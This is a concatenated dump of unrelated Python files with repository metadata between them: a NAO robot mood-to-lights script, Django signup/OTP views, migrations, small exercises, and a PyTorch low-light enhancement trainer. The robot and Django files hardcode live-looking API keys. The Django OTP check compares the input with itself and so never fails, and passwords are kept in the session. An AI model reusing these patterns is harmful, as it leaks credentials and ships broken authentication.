tempobj = {'mood': mood, 'range': '', 'color': '', 'song': ''}
for g in root.findall("//instance[@name='"+mood+"']//attribute[@name='Emotional range']"):
tempobj['range'] = g.text
for elem in root.findall("//connector/from[@instance='"+mood+"']/../to[@class='Color']"):
for e in root.findall("//instance[@name='"+elem.attrib['instance']+"']//attribute[@name='Color']"):
tempobj['color'] = e.text
for elem in root.findall("//connector/from[@instance='"+mood+"']/../to[@class='Music']"):
tempobj['song'] = elem.attrib['instance']
configs.append(tempobj)
return configs
NAO_IP = "192.168.75.41"
vocabulary = ["home", "record"]
SoundDetection = None
memory = None
asr = None
class SoundDetectionModule(ALModule):
""" A simple module able to react
to sound detection events
"""
def __init__(self, name):
ALModule.__init__(self, name)
# No need for IP and port here because
# we have our Python broker connected to NAOqi broker
global asr
# Create a proxy to ALTextToSpeech for later use
asr = ALProxy("ALSpeechRecognition")
self.tts = ALProxy("ALTextToSpeech")
asr.setLanguage("English")
asr.pause(True)
asr.setVocabulary(vocabulary, False)
asr.pause(False)
asr.subscribe("Test_ASR")
# Subscribe to the FaceDetected event:
global memory
memory = ALProxy("ALMemory")
memory.subscribeToEvent("WordRecognized", "SoundDetection", "onWordRecognized")
def onWordRecognized(self, key, value, message):
""" This will be called each time a word is
recognized.
"""
#try:
memory.unsubscribeToEvent("WordRecognized", "SoundDetection")
if(len(value) > 1 and value[1] >= 0.4):
uri_cl1 = "http://192.168.75.102/api/GKcPe6ugIOV0JMNlYUyTlkKMeMCvXdViFerMED25/lights/1/state"
#requests.put(uri_cl1, json = {"effect":"colorwheel"}, headers = {'Content-Type': 'application/json'})
self.tts.say("Recording")
import subprocess
recorder = ALProxy("ALAudioRecorder")
self.tts.say("Starting recorder")
recorder.stopMicrophonesRecording()
recorder.startMicrophonesRecording("/home/nao/test.wav", "wav", 16000, (1,0,0,0))
time.sleep(5)
recorder.stopMicrophonesRecording()
self.tts.say("stopping recorder, analyzing your mood")
subprocess.call(["scp", "nao@192.168.75.41:test.wav","."])
print("creating flac")
subprocess.call(["/Users/stefanstarflinger/Downloads/sox-14.4.2/sox", "test.wav","test.flac"])
print("copying audio file to google cloud")
subprocess.call(["gsutil", "cp","test.flac","gs://audio-for-semtec/"])
token_raw = subprocess.Popen(["gcloud", "auth", "application-default", "print-access-token"], stdout=subprocess.PIPE)
token = token_raw.stdout.read()[:-1]
headers = {"Content-Type": "application/json", "Authorization": "Bearer "+token}
uri = "https://speech.googleapis.com/v1/speech:recognize"
data = json.load(open('sync-request.json'))
print("audio to text")
r = requests.post(uri, json=data, headers=headers)
print(r.text)
text = json.loads(r.content)["results"][0]["alternatives"][0]["transcript"]
print(text)
data_sent = {"document": {"type": "PLAIN_TEXT", "content":text}, "encodingType":"UTF8"}
print("sentiment analysis")
uri_sent = 'https://language.googleapis.com/v1/documents:analyzeSentiment?key=AIzaSyA671KhhlHRqQ_ZxmVou7GaLct_b-Txdes'
print("sentiment analysis resluts")
r_sent = requests.post(uri_sent, json=data_sent)
print(r_sent.text)
led = ALProxy("ALLeds")
player = ALProxy ("ALAudioPlayer")
colors = {"Blue":{"on": True, "bri": 150, "hue": 5448, "sat": 233, "effect": "none", "xy": [ 0.1639, 0.1904 ], "ct": 500}, "Orange":{"on": True, "bri": 80, "hue": 15448, "sat": 233, "effect": "none", "xy": [ 0.5639, 0.4404 ], "ct": 500}, "Red":{"on": True, "bri": 80, "hue": 25448, "sat": 233, "effect": "none", "xy": [ 0.7339, 0.3904 ], "ct": 500}, "Purple":{"on": True, "bri": 87, "hue": 5448, "sat": 233, "effect": "none", "xy": [ 0.4639, 0.1904 ], "ct": 500}, "Green":{"on": True, "bri": 57, "hue": 5448, "sat": 233, "effect": "none", "xy": [ 0.1639, 0.8904 ], "ct": 500}}
print('change led color')
sentimentScore = float(json.loads(r_sent.content)["documentSentiment"]["score"])
print sentimentScore
sent = ''
if(sentimentScore >= 0.5):
sent = "Very positive"
elif(sentimentScore >= 0):
sent = "Positive"
elif(sentimentScore >=-0.7):
sent = "Negative"
elif(sentimentScore >=-1):
sent = "Very negative"
configs = excell()
for config in configs:
if(sent == config["range"]):
fileId = player.loadFile("/home/nao/"+config["song"]+".wav")
requests.put(uri_cl1, json = colors[config["color"]], headers = {'Content-Type': 'application/json'})
player.play(fileId)
self.tts.say("you seem to be "+config["mood"])
col = config["color"]
if(col=="Orange"):
col="red"
led.fadeRGB("AllLeds", col.lower(), 3)
else: pass
#if(sentimentScore > 0):
# fileId = player.loadFile("/home/nao/scream.wav")
# player.play(fileId)
# requests.put(uri_cl1, json = blue, headers = {'Content-Type': 'application/json'})
# self.tts.say("you seem to be happy")
# led.fadeRGB("AllLeds", "blue", 3)
#else:
# requests.put(uri_cl1, json = candle, headers = {'Content-Type': 'application/json'})
# self.tts.say("you seem to be sad")
# led.fadeRGB("AllLeds", "red", 3)
# self.tts.say("awwwwwwwwwwwwww")
print(r_sent.text)
memory.subscribeToEvent("WordRecognized", "SoundDetection", "onWordRecognized")
else:
self.tts.say("I didnt Catch that")
time.sleep(1)
memory.subscribeToEvent("WordRecognized", "SoundDetection", "onWordRecognized")
#except Exception:
# print(Exception)
def main():
""" Main entry point
"""
parser = OptionParser()
parser.add_option("--pip",
help="Parent broker port. The IP address or your robot",
dest="pip")
parser.add_option("--pport",
help="Parent broker port. The port NAOqi is listening to",
dest="pport",
type="int")
parser.set_defaults(
pip=NAO_IP,
pport=9559)
(opts, args_) = parser.parse_args()
pip = opts.pip
pport = opts.pport
# We need this broker to be able to construct
# NAOqi modules and subscribe to other modules
# The broker must stay alive until the program exists
myBroker = ALBroker("myBroker",
"0.0.0.0", # listen to anyone
0, # find a free port and use it
pip, # parent broker IP
pport) # parent broker port
# Warning: HumanGreeter must be a global variable
# The name given to the constructor must be the name of the
# variable
global SoundDetection
SoundDetection = SoundDetectionModule("SoundDetection")
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print
print "Interrupted by user, shutting down"
memory.subscribeToEvent("WordRecognized", "SoundDetection", "onWordRecognized")
myBroker.shutdown()
sys.exit(0)
if __name__ == "__main__":
main() | [
"st3f4n.s@googlemail.com"
] | st3f4n.s@googlemail.com |
22d284e6024960ee996e0e63cfb1a897b4f8961f | c938e81195a8c8e55d97361e81696f5669ce035d | /authapp/views.py | 82b260d601ad51d80e89f4a1c9b2f379379a62dc | [] | no_license | varunnkrishna/ecommshop | 6ae7bde8ce324d97681e26a262ca4a3ddcafbe6a | 4afd8f3a362205843b40da1af1fe3171497d77e6 | refs/heads/master | 2020-08-31T13:24:38.536107 | 2019-11-12T12:13:05 | 2019-11-12T12:13:05 | 218,700,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,523 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
import json
from django.contrib.auth.models import User
from django.shortcuts import render
from django.http import HttpResponse
from django.utils import http
from .models import Register
from .forms import LoginForm
from .forms import RegForm
import random
import http.client
from django.contrib.auth import authenticate,logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User, auth
from django.core.mail import send_mail
# Create your views here.
def register(request):
if request.method=='POST':
reg= RegForm(request.POST)
if reg.is_valid():
x=otp_send(request)
if x:
return render(request,'homeapp/otp_input.html')
else:
return render(request,'authapp/signup.html')
else:
return render(request,'authapp/signup.html')
else:
return render(request, 'authapp/signup.html')
def otpvalidation(request):
newotp=request.POST['otp']
oldotp=request.POST['otp']
if newotp==oldotp:
form=RegForm(request.session['details'])
new_user=User.objects.create_user(username=request.session["uname"],password=request.session['pwd'])
new_user.save()
form.save()
login(request)
return render(request,'homeapp/price.html')
else:
return render(request,'authapp/otp_input.html')
def otp_send(request):
ot = str(random.randint(100000, 999999))
phno=request.POST["phno"]
request.session["uname"]=request.POST["uname"]
request.session["pwd"] = request.POST["pwd"]
# subject="registation otp"
request.session["details"]=request.POST
request.session["otp"]=ot
conn=http.client.HTTPConnection("api.msg91.com")
payload = "{\"sender\":\"VARUNK\", \"route\": \"4\", \"country\": \"91\", \"sms\": [{\"message\":\"" + ot + "\", \"to\": [\"" + phno + "\"]}]}"
headers={'authkey':"301145AUnx4zFX7wp5db6e535",
'content-type':"application/json"}
conn.request("POST","/api/v2/sendsms?country=91&sender=&route=&mobiles=&authkey=&encrypt=&message=&flash=&unicode=&schtime=&aferminute=&response=&campaign=",payload,headers)
data=conn.getresponse()
print('otp_send sucess')
res = json.loads(data.read().decode("UTF-8"))
print('res sucess')
print(res)
if res["type"] == "success":
return True
else:
return False
# @login_required
def login(request):
if request.method == 'POST':
uname = request.POST['uname']
pwd = request.POST['pwd']
user = authenticate(username=uname, password=pwd)
if user is not None:
# send_useremail(request)
# return HttpResponse(request.user.is_authenticated)
auth.login(request, user)
return render(request, 'homeapp/index.html')
else:
return HttpResponse('not sucess')
else:
return render(request, 'authapp/signin.html')
# return render(request,'homeapp/price.html')
def logout(request):
auth.logout(request)
# logout(request)
return render(request,'homeapp/index.html')
# def send_useremail(request):
# send_mail('Welcome to our Shop',
# 'this is a welcome message','varunandpython@gmail.com',
# ['90.varunkrishna@gmail.com'],fail_silently=False)
| [
"90.varunkrishna@gmail.com"
] | 90.varunkrishna@gmail.com |
f07f19f260db04c99168a9086e762d2241a66eaa | d3eb700ac300f1337810b666205c28a0c09ca906 | /problems/migrations/0004_auto_20190625_1748.py | 3c8ba7f589d7a659ba783f54f8a82f8a9ff7bd4d | [] | no_license | prateek2211/quizme | 9f5c4b6963d68870e3a4fe2bcbad233f41a59abc | 298bec83f92408a7f493c834dda0e32d6baff7a4 | refs/heads/master | 2022-12-16T17:33:17.408041 | 2020-05-30T06:02:01 | 2020-05-30T06:02:01 | 195,078,205 | 0 | 0 | null | 2022-12-08T05:52:24 | 2019-07-03T15:08:50 | Python | UTF-8 | Python | false | false | 694 | py | # Generated by Django 2.2.2 on 2019-06-25 17:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('problems', '0003_auto_20190625_1746'),
]
operations = [
migrations.RemoveField(
model_name='problem',
name='author',
),
migrations.AddField(
model_name='problem',
name='author',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"psachan@cs.iitr.ac.in"
] | psachan@cs.iitr.ac.in |
22d609a1e0b11f908b42d7cfcefe3e6f44eae021 | 1fdf153c14eb70eba8ad59b41ac0e53cf7611bd0 | /backend/scholar/apps/projects/migrations/0003_auto_20180407_2358.py | fde882ce866125c2fcbe55fe35548de7461cfe6f | [] | no_license | kegeer/xsv2 | b0814ff853e54c260701b6945f1e3083d66169f1 | 1a8bdea0fe946727ae8283c5a5346db88ddeb783 | refs/heads/master | 2022-12-15T00:22:24.467965 | 2018-04-12T23:48:52 | 2018-04-12T23:48:52 | 129,317,782 | 0 | 0 | null | 2022-12-08T01:00:45 | 2018-04-12T22:27:28 | JavaScript | UTF-8 | Python | false | false | 433 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-04-07 15:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0002_auto_20180407_2348'),
]
operations = [
migrations.RenameField(
model_name='oss',
old_name='mine_type',
new_name='mime_type',
),
]
| [
"zhangkeger@qq.com"
] | zhangkeger@qq.com |
c5972fb966191bc7e25aec8a9fcf0929d506b19e | 857461387f55d9f34d5c7e408f03887dc68abcf9 | /08_Recursion_and_Dynamic_Programming/SubsetsGeneration/solution.py | 85ed6f5fdab96451319d5d907dee29d7be42eccc | [] | no_license | efrencodes/Interview-Questions | 579995e18e14fcc8f21aa5b6ab647ab775d2a5ac | 1049d6a6eb5fe3f28e9d4eb9064cf53af0e68559 | refs/heads/master | 2022-04-05T05:07:55.717290 | 2020-02-09T21:16:48 | 2020-02-09T21:16:48 | 294,033,060 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | a = ['a','b','c','d']
def subset(arr, cur, res, ind):
# print(cur, ind)
if ind > len(arr):
return
if ind == len(arr):
test = list(cur)
res.append(test)
return
subset(arr, cur, res, ind+1)
cur.append(arr[ind])
subset(arr, cur, res, ind+1)
cur.pop()
res = []
subset(a, [], res, 0)
print(res)
print(len(res))
| [
"noreply@github.com"
] | efrencodes.noreply@github.com |
ab4b58c9f57d81b86dab68de0f9e7f748fa7cce3 | 7680dbfce22b31835107403514f1489a8afcf3df | /Exercícios_parte_2/exercício__090.py | ee3ab125b849a111a10a421c0ee9807bb6c49dac | [] | no_license | EstephanoBartenski/Aprendendo_Python | c0022d545af00c14e6778f6a80f666de31a7659e | 69b4c2e07511a0bd91ac19df59aa9dafdf28fda3 | refs/heads/master | 2022-11-27T17:14:00.949163 | 2020-08-03T22:11:19 | 2020-08-03T22:11:19 | 284,564,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,083 | py | # dicionários
print('--' * 17)
print(' CADASTRO DE NOTAS')
print('--' * 17)
aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input('Média de {}: '.format(aluno['nome'])))
print()
print(f' - O nome é {aluno["nome"]}.\n'
f' - A média é {aluno["med"]:.2f}.')
if aluno['med'] >= 7:
print(' - Situação: APROVADO!')
aluno['situação'] = 'aprovado'
elif 5 <= aluno['med'] < 7:
print(' - Situação: RECUPERAÇÃO!')
aluno['situação'] = 'recuperação'
else:
print(' - Situação: REPROVADO!')
aluno['situação'] = 'reprovado'
print()
print(aluno)
# outra resolução:
'''aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input(f'Média de {aluno["nome"]} '))
if aluno['med'] >= 7:
aluno['situação'] = 'Aprovado'
elif 5 <= aluno['med'] < 7:
aluno['situação'] = 'Recuperação'
else:
aluno['situação'] = 'Reprovado'
print('--' * 30)
for k, v in aluno.items():
print(f' - {k} é igual a {v}')''' | [
"noreply@github.com"
] | EstephanoBartenski.noreply@github.com |
f43106f2bbad97ce033f51800ec1c592fd55ad07 | c9de0bbab78c282c9e9ca8b66215bd1f1fb52d3c | /fundamentos/desafio.py | 4065056bfd80f07c9c06df0d82311a171e767b46 | [] | no_license | eduardoldk-hub/curso_python | c8e6a34ee90cc6a5ca9654abf13cea54c197a51a | 6dfe629594de754b7d014876f744152953c02a3b | refs/heads/master | 2022-08-20T19:40:29.681084 | 2020-05-20T19:11:02 | 2020-05-20T19:11:02 | 265,662,805 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | # Calcular quantos porcento do salario está comprometico a pagar
# as despesas
salario = 3450.45
despesas = 2456.2
porcentagem_gasta = salario - despesas * 100 / 2
| [
"eduardoldk@outlook.com"
] | eduardoldk@outlook.com |
6a30cbfb25c3756b58f923dd2d8b1a34a2949c11 | 02316317d5016b309c59fee039c09f349910fab4 | /pt_restore.py | 95551cd42e2d6746634a5d81edec09e6d418ff2c | [] | no_license | JaChouSSS/the-pytorch-implementation-of-Kindling-the-Darkness-A-Practical-Low-light-Image-Enhancer- | 568ae742d041a20e05fa71790778bd96c5f15973 | f44eee315b6abfd7d9e92824900bf58bfe77c4ac | refs/heads/master | 2023-08-15T05:26:23.970127 | 2021-09-25T06:05:10 | 2021-09-25T06:05:10 | 289,166,381 | 16 | 1 | null | null | null | null | UTF-8 | Python | false | false | 22,836 | py | import random
from model3 import *
from pt_utils import *
import torch.optim as optim
import os
import torch
import glob
import cv2
import time
from torch.utils.data import Dataset, DataLoader
from padding_same_conv import *
######################### decomnet
#########################
def pt_grad_loss(input_r_low, input_r_high):
#input_r_low = torch.Tensor(input_r_low)
#input_r_high = torch.Tensor(input_r_high)
gray = RGB2Gray().cuda()
input_r_low_gray = gray(input_r_low)
input_r_high_gray = gray(input_r_high)
#input_r_low_gray = tf.image.rgb_to_grayscale(input_r_low)
#input_r_high_gray = tf.image.rgb_to_grayscale(input_r_high)
#t= gradient2(input_r_low_gray, 'x')
#print('t ===== ',t)
#print('input_r_low_gray',input_r_low_gray.shape)
x_loss = torch.pow(gradient2(input_r_low_gray, 'x') - gradient2(input_r_high_gray, 'x'),2)
#print('pt x_loss ',x_loss.shape)
y_loss = torch.pow(gradient2(input_r_low_gray, 'y') - gradient2(input_r_high_gray, 'y'),2)
grad_loss_all = torch.mean(x_loss + y_loss)
#print('pt grad_loss ', grad_loss_all)
return grad_loss_all
def gauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function
"""
x_data, y_data = np.mgrid[-size//2 + 1:size//2 + 1, -size//2 + 1:size//2 + 1]
#print('x_data :',x_data.shape)
#x_data = np.expand_dims(x_data, axis=-1)
#x_data = np.expand_dims(x_data, axis=-1)
x_data = torch.Tensor(x_data).unsqueeze(0).unsqueeze(0)
#print('x_data :', y_data)
y_data = torch.Tensor(y_data).unsqueeze(0).unsqueeze(0)
#y_data = np.expand_dims(y_data, axis=-1)
#y_data = np.expand_dims(y_data, axis=-1)
#print('x_data2 :', x_data.shape)
#x = tf.constant(x_data, dtype=tf.float32)
#y = tf.constant(y_data, dtype=tf.float32)
#g = tf.exp(-((x**2 + y**2)/(2.0*sigma**2)))
g = torch.exp(-((x_data **2 + y_data **2)/(2.0 * sigma ** 2)))
return g / torch.sum(g)
def pt_ssim(img1, img2, cs_map=False, mean_metric=True, size=11, sigma=1.5):
#img1 = torch.Tensor(img1)
#img2 = torch.Tensor(img2)
window = gauss(size, sigma) # window shape [size, size]
K1 = torch.Tensor([0.01]).cuda()
K2 = torch.Tensor([0.03]).cuda()
L = torch.Tensor([1]).cuda() # depth of image (255 in case the image has a differnt scale)
C1 = torch.pow(K1*L,2)
C2 = torch.pow(K2*L,2)
#mu1 = tf.nn.conv2d(img1, window, strides=[1,1,1,1], padding='VALID')
#mu1 = nn.Parameter(data=window, requires_grad=False)
weight = nn.Parameter(data=window, requires_grad=False).cuda()
mu1 = F.conv2d(img1,weight).cuda()
#mu2 = tf.nn.conv2d(img2, window, strides=[1,1,1,1],padding='VALID')
mu2 = F.conv2d(img2,weight).cuda()
mu1_sq = mu1*mu1
mu2_sq = mu2*mu2
mu1_mu2 = mu1*mu2
#sigma1_sq = tf.nn.conv2d(img1*img1, window, strides=[1,1,1,1],padding='VALID')
sigma1_sq = F.conv2d(img1*img1,weight).cuda()- mu1_sq
#sigma2_sq = tf.nn.conv2d(img2*img2, window, strides=[1,1,1,1],padding='VALID') - mu2_sq
sigma2_sq = F.conv2d(img2*img2,weight).cuda()- mu2_sq
#sigma12 = tf.nn.conv2d(img1*img2, window, strides=[1,1,1,1],padding='VALID') - mu1_mu2
sigma12 = F.conv2d(img1*img2,weight).cuda()- mu1_mu2
if cs_map:
value = (((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*
(sigma1_sq + sigma2_sq + C2)),
(2.0*sigma12 + C2)/(sigma1_sq + sigma2_sq + C2))
else:
value = ((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*
(sigma1_sq + sigma2_sq + C2))
if mean_metric:
value = torch.mean(value)
#print('pt ' ,value)
return value
def pt_ssim_loss(output_r, input_high_r):
output_r_1 = output_r[:,0:1,:,:] # R
input_high_r_1 = input_high_r[:,0:1,:,:]
ssim_r_1 = pt_ssim(output_r_1, input_high_r_1)
#print('pt r_1', ssim_r_1)
output_r_2 = output_r[:,1:2,:,:] #G
input_high_r_2 = input_high_r[:,1:2,:,:]
ssim_r_2 = pt_ssim(output_r_2, input_high_r_2)
#print('pt r_1', ssim_r_2)
output_r_3 = output_r[:,2:3,:,:] #B
input_high_r_3 = input_high_r[:,2:3,:,:]
ssim_r_3 = pt_ssim(output_r_3, input_high_r_3)
#print('pt r_1', ssim_r_3)
ssim_r = (ssim_r_1 + ssim_r_2 + ssim_r_3)/3.0
loss_ssim1 = 1-ssim_r
print('pt ssim loss :', loss_ssim1)
return loss_ssim1
def grad_loss(input_i_low, input_i_high):
x_loss = torch.pow(gradient2(input_i_low, 'x') - gradient2(input_i_high, 'x'),2)
y_loss = torch.pow(gradient2(input_i_low, 'y') - gradient2(input_i_high, 'y'),2)
grad_loss_all = torch.mean(x_loss + y_loss)
return grad_loss_all
# def adjust_loss(output_r , input_high_r):
# loss_ssim = pt_ssim_loss(output_r, input_high_r)
# loss_grad = pt_grad_loss(output_r, input_high_r)
# loss_square = torch.mean(tf.square(output_r - input_high_r)) # * ( 1 - input_low_r ))#* (1- input_low_i)))
# loss_adjust = loss_square + loss_grad + loss_ssim
# return loss_adjust
class restore_loss(nn.Module):
def __init__(self):
super(restore_loss,self).__init__()
def forward(self,output_r , input_high_r):
loss_ssim = pt_ssim_loss(output_r, input_high_r)
loss_grad = pt_grad_loss(output_r, input_high_r)
loss_square = torch.mean(torch.pow((output_r - input_high_r),2)) # * ( 1 - input_low_r ))#* (1- input_low_i)))
loss_adjust = loss_square + loss_grad + loss_ssim
return loss_adjust
def load_images(im):
img = np.array(im, dtype="float32") / 255.0
img_max = np.max(img)
img_min = np.min(img)
img_norm = np.float32((img - img_min) / np.maximum((img_max - img_min), 0.001)) #
return img_norm
def data_augmentation(image, mode):
if mode == 0:
# original
return image
elif mode == 1:
# flip up and down
return np.flipud(image) #
# torch.flip
elif mode == 2:
# rotate counterwise 90 degree
return np.rot90(image) #
elif mode == 3:
# rotate 90 degree and flip up and down
image = np.rot90(image) #
return np.flipud(image) #
elif mode == 4:
# rotate 180 degree
return np.rot90(image, k=2) #
elif mode == 5:
# rotate 180 degree and flip
image = np.rot90(image, k=2) #
return np.flipud(image) #
elif mode == 6:
# rotate 270 degree
return np.rot90(image, k=3) #
elif mode == 7:
# rotate 270 degree and flip
image = np.rot90(image, k=3) #
return np.flipud(image) #
def read_directory(directory_name):
array_of_img = []
# print(os.listdir(directory_name))
for filename in os.listdir(directory_name):
img = cv2.imread(directory_name + "/" + filename) # directory_name + "/" +
img = load_images(img)
array_of_img.append(img)
# print(img)
# print('img:',img)
return array_of_img
class adjustdataset(Dataset):
def __init__(self, low_i, low_r, h_r):
self.low_i = low_i
self.low_r = low_r
self.h_r = h_r
self.len = len(h_r)
def __getitem__(self, index):
# self.low_img[index], self.high_img[index]
#print('low_i shape', self.low_i.shape)
h = self.low_i[index].shape[0]
w = self.low_i[index].shape[1]
#print(' h ', h, ' w ', w)
x = random.randint(0, h - patch_size) #
y = random.randint(0, w - patch_size) #
rand_mode = random.randint(0, 7) #
#print('low_i shape :', self.low_i[0].shape)
start = time.time()
l_i = data_augmentation(
self.low_i[index][x: x + patch_size, y: y + patch_size, :], rand_mode)
l_r = data_augmentation(
self.low_r[index][x: x + patch_size, y: y + patch_size, :], rand_mode) #
hh_r = data_augmentation(
self.h_r[index][x: x + patch_size, y: y + patch_size, :], rand_mode)
end = time.time()
#print('data_augment time',end - start)#e-5 ~ e-4
start = time.time()
l_i = l_i.copy()
l_r = l_r.copy()
hh_r = hh_r.copy()
l_r = torch.tensor(l_r).cuda()
l_i = torch.tensor(l_i).cuda()
hh_r = torch.tensor(hh_r).cuda() # return low, high
end = time.time()
print('copy cuda time',end - start) #0.03 ~ 0.005
#print('l_r shape :', l_r.shape)
#print('l_i shape :', l_i.shape)
#print('hh_r shape :', hh_r.shape)
return l_r, l_i, hh_r
def __len__(self):
return self.len
class DealDataset(Dataset):
def __init__(self):
# xy = np.loadtxt('../dataSet/diabetes.csv.gz', delimiter=',', dtype=np.float32) #
# self.x_data = torch.from_numpy(xy[:, 0:-1])
# self.y_data = torch.from_numpy(xy[:, [-1]])
# self.len = xy.shape[0]
# low = open('')
# hight = open('')
# print(self.low_names)
start = time.time()
self.low_img = read_directory('/home/intern2/jay/project/pt_kind/dataset/our485/low')
self.high_img = read_directory('/home/intern2/jay/project/pt_kind/dataset/our485/high')
self.low_i = []
self.low_r = []
self.h_r = []
end = time.time()
print('load img time :', end - start)
# self.low_names.sort()
# self.high_names.sort()
# print(self.low_names)
#
# im = Image.open(self.low_names[0])
# im = cv2.imread(im)
# im = torch.FloatTensor(im)
# print(im)
self.len = len(self.low_img)
def __getitem__(self, index):
self.low_img[index], self.high_img[index]
h = self.low_img[index].shape[0]
w = self.low_img[index].shape[1]
x = random.randint(0, h - patch_size) #
y = random.randint(0, w - patch_size) #
# rand_mode = random.randint(0, 7) #
# low = data_augmentation(
# self.low_img[index][x: x + patch_size, y: y + patch_size, :], rand_mode)
# high = data_augmentation(
# self.high_img[index][x: x + patch_size, y: y + patch_size, :], rand_mode) #
# low = low.copy()
# high = high.copy()
# low = torch.tensor(low)
# high = torch.tensor(high)
# return low, high
return self.low_img[index], self.high_img[index]
def __len__(self):
return self.len
# loss
class decom_loss(nn.Module):
def __init__(self):
super(decom_loss, self).__init__()
def forward(self, input_low, input_high, R_low, I_low, R_high, I_high): # input_low,input_high,
# input_low = torch.Tensor(input_low)
# input_high = torch.Tensor(input_high)
# R_low = torch.Tensor(R_low)
# I_low = torch.Tensor(I_low)
# R_high = torch.Tensor(R_high)
# I_high = torch.Tensor(I_high)
# print('enter forward===========================')
I_low_3 = torch.cat([I_low, I_low, I_low], axis=1) # torch.cat
I_high_3 = torch.cat([I_high, I_high, I_high], axis=1) # torch.cat
# print(' 1 ===========================')
output_R_low = R_low
output_R_high = R_high
output_I_low = I_low_3
output_I_high = I_high_3
recon_loss_low = torch.mean(torch.abs(R_low * I_low_3 - input_low)) # torch.mean orch.abs
recon_loss_high = torch.mean(torch.abs(R_high * I_high_3 - input_high)) # torch.mean orch.abs
# print(' 2 ===========================')
equal_R_loss = torch.mean(torch.abs(R_low - R_high))
# print(' 3 ===========================')
i_mutual_loss = mutual_i_loss2(I_low, I_high)
# print(' 4 ===========================')
i_input_mutual_loss_high = mutual_i_input_loss2(I_high, input_high)
i_input_mutual_loss_low = mutual_i_input_loss2(I_low, input_low)
# loss_Decom = 1 * recon_loss_high + 1 * recon_loss_low \
# + 0.01 * equal_R_loss + 0.2 * i_mutual_loss \
# + 0.15 * i_input_mutual_loss_high + 0.15 * i_input_mutual_loss_low
# print('loss 1 :',loss_Decom)
t1 = torch.tensor([1]).cuda()
t2 = torch.tensor([0.01]).cuda()
t3 = torch.tensor([0.2]).cuda() # 0.2
t4 = torch.tensor([0.02]).cuda() # 0.15
t5 = torch.tensor([0.15]).cuda()
# m0 = torch.mul(recon_loss_high,t1)
# m1 = torch.mul(recon_loss_low,t1)
# m2 = torch.mul(equal_R_loss,t2)
# m3 = torch.mul(i_mutual_loss,t3)
# m4 = torch.mul(i_input_mutual_loss_high,t4)
# m5 = torch.mul(i_input_mutual_loss_low,t4)
# loss_Decom = torch.tensor([0])
# loss_Decom =torch.add(loss_Decom , m0)
# loss_Decom = torch.add(loss_Decom, m1)
# loss_Decom = torch.add(loss_Decom, m2)
# loss_Decom = torch.add(loss_Decom, m3)
# loss_Decom = torch.add(loss_Decom, m4)
# loss_Decom = torch.add(loss_Decom, m5)
loss_Decom = torch.mul(recon_loss_high, t1) + torch.mul(recon_loss_low, t1) + torch.mul(equal_R_loss, t2) + \
torch.mul(i_mutual_loss, t3) + torch.mul(i_input_mutual_loss_high, t4) + torch.mul(
i_input_mutual_loss_low, t5) # \
# torch.mul(i_input_mutual_loss_high,t4) + torch.mul(i_input_mutual_loss_low,t4)
# print('loss :',loss_Decom)
# print('loss:',loss_Decom)
# loss_Decom.requires_grad = True
# loss_Decom = torch.tensor(loss_Decom)
return loss_Decom
# low_img=read_directory('/home/intern2/jay/project/pt_kind/dataset/our485/low')
# high_img = read_directory('/home/intern2/jay/project/pt_kind/dataset/our485/high')
# low_img = torch.tensor(low_img[0:100,:,:,:]).cuda()
# high_img = torch.tensor(high_img).cuda()
def save_images(filepath, result_1, result_2=None, result_3=None):
result_1 = result_1.cpu().detach().numpy()
result_2 = result_2.cpu().detach().numpy()
# print('result1 shape',result_1.shape)
# print('result2 shape',result_2.shape)
result_1 = np.squeeze(result_1)
result_2 = np.squeeze(result_2)
# result_3 = np.squeeze(result_3)
# if not result_2.any():
# cat_image = result_1
# else:
cat_image = np.concatenate([result_1, result_2], axis=1)
# if not result_3.any():
# cat_image = cat_image
# else:
# cat_image = np.concatenate([cat_image, result_3], axis = 1)
cv2.imwrite(filepath, cat_image * 255.0)
print(filepath)
# im = Image.fromarray(np.clip(cat_image * 255.0, 0, 255.0).astype('uint8'))
# im.save(filepath, 'png')
if __name__ == "__main__":
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
start_epoch = 0
epoch = 9999999
everyepoch = 3000
start_step = 0
numBatch = 1 # batchsize 10
batch_size = 4
decim_batch_size = 1
adj_batch_size = 485
patch_size = 384
learning_rate = 0.0001
sample_dir = './eval_restore/1'
model_decom_CKPT_PATH = './check/MyNet_2000_best.pkl'
sample_decom_dir = './result/decom_eval'
checkpoints = torch.load(model_decom_CKPT_PATH)
checkpoint = checkpoints['state_dict']
decomposed_low_r_data_480 = []
decomposed_low_i_data_480 = []
decomposed_high_r_data_480 = []
###
# train_low_data = read_directory('/home/intern2/jay/project/pt_kind/dataset/our485/low')
# train_high_data = read_directory('/home/intern2/jay/project/pt_kind/dataset/our485/low')
R_low = []
R_high = []
I_low_3 = []
I_high_3 = []
output_R_low = R_low
output_R_high = R_high
output_I_low = I_low_3
output_I_high = I_high_3
model_restore = RestorationNet()
model_restore = nn.DataParallel(model_restore).cuda()
optimizer = optim.Adam(model_restore.parameters(), lr=learning_rate)
##dloss = decom_loss()
# dloss.cuda()
##dataloader
dealDataset = DealDataset()
train_loader = DataLoader(dataset=dealDataset,
batch_size=decim_batch_size,
shuffle=True) # ,num_workers=16
# batch_input_low = np.zeros((batch_size, patch_size, patch_size, 3), dtype="float32") #
